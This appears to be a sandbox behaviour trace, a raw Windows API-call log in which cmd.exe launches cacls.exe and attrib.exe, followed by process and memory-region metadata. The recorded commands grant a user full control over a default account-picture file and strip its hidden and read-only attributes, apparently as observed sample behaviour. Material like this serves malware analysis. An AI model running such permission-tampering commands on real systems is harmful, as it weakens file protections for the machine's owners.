_wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.511] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x16f790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.511] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f790, lpFilePart=0x16f78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f78c*="Desktop") returned 0x18 [0185.511] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.512] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f50c | out: lpFindFileData=0x16f50c) returned 0x260ae8 [0185.512] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0185.512] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f50c | out: lpFindFileData=0x16f50c) returned 0x260ae8 [0185.512] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0185.512] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f50c | out: lpFindFileData=0x16f50c) returned 0x260ae8 [0185.512] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0185.512] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.512] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0185.512] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0185.512] GetEnvironmentStringsW () returned 0x260308* [0185.513] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.513] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.513] GetConsoleOutputCP () returned 0x1b5 [0185.513] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.513] GetUserDefaultLCID () returned 0x409 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, 
lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f8d0, cchData=128 | out: lpLCData="0") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f8d0, cchData=128 | out: lpLCData="0") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f8d0, cchData=128 | out: lpLCData="1") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0185.514] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.515] GetConsoleTitleW (in: lpConsoleTitle=0x2509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.515] GetProcAddress 
(hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0185.515] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0185.515] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0185.516] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0185.516] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0185.517] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0185.517] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0185.517] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0185.517] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0185.517] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0185.517] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0185.519] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0185.519] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0185.519] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0185.519] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0185.519] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0185.519] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0185.519] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0185.521] GetConsoleTitleW (in: lpConsoleTitle=0x16f564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.522] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.522] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.522] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.522] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.522] _wcsicmp (_String1="CACLS", 
_String2="RENAME") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.522] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.522] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.522] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.522] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.522] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.522] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.522] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.522] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.522] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.522] _wcsicmp 
(_String1="CACLS", _String2="POPD") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.522] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.522] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.522] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.522] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.523] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.523] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.523] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.523] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.523] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.523] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.523] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.523] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.523] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.523] _wcsicmp 
(_String1="CACLS", _String2="CALL") returned -9 [0185.523] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.523] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.523] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.523] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.523] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.523] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.523] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.523] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.523] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.523] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.523] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.523] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.523] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0185.523] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0185.523] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0185.524] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0185.524] SetErrorMode (uMode=0x0) returned 0x0 [0185.524] SetErrorMode (uMode=0x1) returned 0x0 [0185.524] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x261e98, lpFilePart=0x16f084 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f084*="Desktop") returned 0x18 [0185.524] SetErrorMode (uMode=0x0) returned 0x1 [0185.524] GetEnvironmentVariableW (in: lpName="PATH", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.524] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.529] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.530] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.530] GetLastError () returned 0x2 [0185.530] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.530] GetLastError () returned 0x2 [0185.531] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x262180 [0185.531] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0185.531] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.531] GetLastError () returned 0x2 [0185.531] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x262180 [0185.531] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0185.531] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.531] _wcsicmp (_String1=".EXE", _String2=".CMD") 
returned 2 [0185.531] GetConsoleTitleW (in: lpConsoleTitle=0x16f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.531] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f248 | out: lpAttributeList=0x16f180, lpSize=0x16f248) returned 1 [0185.531] UpdateProcThreadAttribute (in: lpAttributeList=0x16f180, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f180, lpPreviousValue=0x0) returned 1 [0185.531] GetStartupInfoW (in: lpStartupInfo=0x16f13c | out: lpStartupInfo=0x16f13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.531] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.532] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f228 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 
Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x16f228*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe1c, dwThreadId=0xd30)) returned 1 [0185.535] CloseHandle (hObject=0x4c) returned 1 [0185.535] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.535] GetEnvironmentStringsW () returned 0x260308* [0185.535] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.535] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.568] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f11c | out: lpExitCode=0x16f11c*=0x0) returned 1 [0185.568] CloseHandle (hObject=0x50) returned 1 [0185.568] _vsnwprintf (in: _Buffer=0x16f264, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f128 | out: _Buffer="00000000") returned 8 [0185.568] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.568] GetEnvironmentStringsW () returned 0x262410* [0185.568] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.568] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.568] GetEnvironmentStringsW () returned 0x262410* [0185.568] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.568] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f180 | out: lpAttributeList=0x16f180) [0185.568] GetConsoleTitleW (in: lpConsoleTitle=0x16f564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.569] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.569] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.569] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.569] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.569] GetLastError () returned 0x2 [0185.569] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.569] GetLastError () returned 0x2 [0185.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x25e4d8 [0185.569] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0185.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.570] GetLastError () returned 0x2 [0185.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x25e4d8 [0185.570] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0185.570] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.570] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.570] GetConsoleTitleW (in: lpConsoleTitle=0x16f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.570] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f248 | out: lpAttributeList=0x16f180, lpSize=0x16f248) returned 1 [0185.570] UpdateProcThreadAttribute (in: lpAttributeList=0x16f180, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f240, 
cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f180, lpPreviousValue=0x0) returned 1 [0185.570] GetStartupInfoW (in: lpStartupInfo=0x16f13c | out: lpStartupInfo=0x16f13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.570] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.570] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f228 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessInformation=0x16f228*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd70, dwThreadId=0xef0)) returned 1 [0185.572] CloseHandle (hObject=0x50) returned 1 [0185.572] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.572] GetEnvironmentStringsW () returned 0x262410* [0185.572] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.572] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 
[0185.608] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x16f11c | out: lpExitCode=0x16f11c*=0x0) returned 1 [0185.608] CloseHandle (hObject=0x4c) returned 1 [0185.608] _vsnwprintf (in: _Buffer=0x16f264, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f128 | out: _Buffer="00000000") returned 8 [0185.608] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.608] GetEnvironmentStringsW () returned 0x262410* [0185.608] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.608] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.608] GetEnvironmentStringsW () returned 0x262410* [0185.608] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.608] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f180 | out: lpAttributeList=0x16f180) [0185.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.609] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.609] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.609] SetConsoleInputExeNameW () returned 0x1 [0185.609] GetConsoleOutputCP () returned 0x1b5 [0185.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.609] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.609] exit (_Code=0) Process: id = "374" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "373" os_parent_pid = "0xf70" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = 
"CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26483 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26484 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26485 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26486 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26487 start_va = 0xfb0000 end_va = 0xfb8fff entry_point = 0xfb0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26488 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26489 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26490 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26491 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" 
